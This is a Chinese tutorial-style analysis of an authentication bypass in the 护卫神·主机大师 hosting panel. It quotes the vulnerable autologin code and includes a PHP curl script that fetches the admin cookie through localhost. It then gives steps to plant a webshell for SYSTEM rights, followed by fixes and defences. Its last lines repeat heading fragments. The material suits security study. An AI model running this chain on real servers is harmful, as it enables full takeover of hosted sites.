护卫神主机大师提权漏洞利用分析教学文档<\/h1>

漏洞概述<\/h2>
护卫神·主机大师是一款支持一键安装网站运行环境(IIS+ASP+ASP.net+PHP5.2-5.6+MySQL+FTP+伪静态+PhpMyAdmin)的虚拟主机管理系统。该系统存在一个本地身份验证绕过漏洞，允许攻击者在已获取低权限webshell的情况下提升至system权限。<\/p>

漏洞细节<\/h2>

漏洞位置<\/h3>
`\/admin\/index.asp<\/code>文件中的身份验证逻辑<\/p>`

漏洞代码分析<\/h3>
<%Option Explicit%>
<!--#include file="..\/conn.asp"-->
<%
Dim strIp
strIp = Request.ServerVariables("local_addr")
Dim strAuto
strAuto = LCase(Trim(Request.QueryString("f")))
If (strIp = "::1" Or strIp = "127.0.0.1") And strAuto = "autologin" Then 
    '获取管理用户登录
    Dim sql,rs
    call conn_open()
    Set rs = Server.CreateObject("Adodb.Recordset")
    sql = "select top 1 * from [huweishen_Admin]"
    rs.Open sql,conn,1,1
    if rs.RecordCount = 0 then
        Session("admin")= "autologin"
    else
        Session("admin") = rs("username")
    end if
    rs.Close
    Session.Timeout =600
    AddLog Session("admin"), 1, "控制台直接登录管理中心"
    Response.Redirect "index.asp"
End If
%>
<\/code><\/pre>
漏洞原理<\/h3>

系统检查请求来源IP是否为本地(127.0.0.1或::1)<\/li>
同时检查URL参数f是否为"autologin"<\/li>
如果满足以上两个条件，则直接登录系统，无需账号密码验证<\/li>
开发者未考虑内部用户是否合法，导致攻击者可通过低权限webshell伪造本地请求<\/li>
<\/ol>
利用前提<\/h2>

已获取目标主机上的一个低权限webshell<\/li>
护卫神主机管理系统运行在6588端口<\/li>
程序路径通常为x:\HwsHostMaster\host\web\<\/code><\/li>
系统以system权限运行<\/li>
<\/ul>
漏洞利用步骤<\/h2>
第一步：验证漏洞存在<\/h3>

通过已有webshell确认护卫神主机大师安装<\/li>
检查\/admin\/index.asp<\/code>文件是否存在上述漏洞代码<\/li>
<\/ol>
第二步：获取管理员cookie<\/h3>
上传以下PHP脚本到服务器并执行：<\/p>
<?<\/span>php<\/span>
<\/span><\/span>function<\/span> httpGet<\/span>() {
<\/span><\/span>    $url =<\/span> 'http:\/\/127.0.0.1:6588\/admin\/index.asp?f=autologin'<\/span>;
<\/span><\/span>    $ch =<\/span> curl_init<\/span>();
<\/span><\/span>    curl_setopt<\/span>($ch, CURLOPT_URL<\/span>, $url);
<\/span><\/span>    curl_setopt<\/span>($ch, CURLOPT_HEADER<\/span>, TRUE<\/span>); \/\/表示需要response header
<\/span><\/span><\/span><\/span>    curl_setopt<\/span>($ch, CURLOPT_NOBODY<\/span>, TRUE<\/span>); \/\/表示需要response body
<\/span><\/span><\/span><\/span>    curl_setopt<\/span>($ch, CURLOPT_RETURNTRANSFER<\/span>, TRUE<\/span>);
<\/span><\/span>    curl_setopt<\/span>($ch, CURLOPT_FOLLOWLOCATION<\/span>, FALSE<\/span>);
<\/span><\/span>    curl_setopt<\/span>($ch, CURLOPT_AUTOREFERER<\/span>, TRUE<\/span>);
<\/span><\/span>    curl_setopt<\/span>($ch, CURLOPT_TIMEOUT<\/span>, 120<\/span>);
<\/span><\/span>    $result =<\/span> curl_exec<\/span>($ch);
<\/span><\/span>    return<\/span> $result;
<\/span><\/span>}
<\/span><\/span>echo<\/span> httpGet<\/span>();
<\/span><\/span>?><\/span>
<\/span><\/span><\/span><\/code><\/pre>第三步：修改cookie访问后台<\/h3>

从脚本响应中获取管理员cookie<\/li>
在浏览器中修改cookie<\/li>
直接访问\/admin\/index.asp<\/code>进入后台<\/li>
<\/ol>
第四步：上传webshell获取system权限<\/h3>

进入后台后点击"网站列表"<\/li>
选择一个网站，点击"解压"进入操作界面<\/li>
通过FTP或其他方式上传包含webshell的压缩包<\/li>
输入文件名和解压路径，解压路径设置为护卫神管理系统路径(如X:\HwsHostMaster\host\web\<\/code>)<\/li>
使用相对路径指向虚拟主机管理系统web路径<\/li>
点击解压后，webshell将被解压到管理系统目录下，获得system权限<\/li>
<\/ol>
修复方案<\/h2>

删除\/admin\/index.asp<\/code>文件中第3行到第30行之间的漏洞代码<\/li>
或修改验证逻辑，增加更严格的身份验证机制<\/li>
不要过度信任本地请求，应对所有管理操作进行严格身份验证<\/li>
<\/ol>
漏洞影响<\/h2>

该漏洞允许低权限用户提升至system权限<\/li>
攻击者可以完全控制系统上的所有网站和服务<\/li>
漏洞利用需要先获取低权限webshell，因此影响范围有限<\/li>
<\/ul>
防御建议<\/h2>

及时更新护卫神主机大师到最新版本<\/li>
定期审计系统代码，特别是身份验证相关部分<\/li>
实施最小权限原则，限制每个用户的权限<\/li>
监控系统日志，检测可疑活动<\/li>
使用Web应用防火墙(WAF)保护管理系统<\/li>
<\/ol>

护卫神主机大师提权漏洞利用分析教学文档<\/h1>

漏洞细节<\/h2>

漏洞位置<\/h3> \/admin\/index.asp<\/code>文件中的身份验证逻辑<\/p>

漏洞利用步骤<\/h2>

漏洞位置<\/h3>
`\/admin\/index.asp<\/code>文件中的身份验证逻辑<\/p>`